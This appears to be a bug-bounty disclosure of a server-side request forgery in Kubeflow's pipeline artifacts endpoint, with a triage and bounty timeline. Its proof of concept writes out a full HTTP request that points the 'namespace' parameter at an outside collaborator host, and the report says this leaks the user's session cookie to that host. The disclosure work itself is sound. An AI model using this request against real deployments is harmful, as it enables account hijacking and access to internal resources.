External HTTP Interaction in kubeflow/kubeflow

Valid

Reported on

Apr 17th 2023


Description

Any user can use Kubeflow as a proxy to access both internal and external resources and have the response to the request returned to the user.

PoC

URL Parameter: namespace

Request:

GET /pipeline/artifacts/get?source=xm&namespace=9eomgq1gcd6tzkmqvib9clrneek58zwo.oastify.com&peek=256&bucket=mlpipeline&key=artifacts%2Ftrainingjob-q2fvq%2F2023%2F03%2F16%2Ftrainingjob-q2fvq-1001629031%2Fmain.log HTTP/1.1
Host: 127.0.0.1:9999
sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
sec-ch-ua-platform: "macOS"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:9999/pipeline/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
cookie: authservice_session=MTY4MTc1MTUxN3xOd3dBTkROSFJFcFFUVFpJU0VwQ1dsbFRVelZOU2sxRVJqUkZTa3RTTTFwVlYwRlVWVFZGV1ZrMVQwOVpNa3BLU1RkUVJsTlpTMUU9fLLtca39Ki69m3CjrYYtyjAjyhdv6zPWIyJPcLVSczLZ
Connection: close

Responses can be seen in this private album: https://imgur.com/a/DRiwDra

The Kubeflow server returns Burp Collaborator's response to the user of Kubeflow. Note that Kubeflow sends the user's authentication cookie with the request allowing for account hijacking.

Impact

Account hijacking, access to internal resources, browser hijacking. Either a logged in user can access internal resources, or an attacker can payload a link and have an authenticated user click it to steal their credentials or hijack their browser.

Occurrences

This is the parameter but probably not the right spot in the code for the vuln.

We are processing your report and will contact the kubeflow team within 24 hours. 10 months ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists 10 months ago
Dan McInerney modified the report
9 months ago
Dan McInerney modified the Severity from High (8.5) to High (7.7) 4 months ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Marcello validated this vulnerability 4 months ago
danmcinerney has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
This vulnerability has now been published 2 months ago
to join this conversation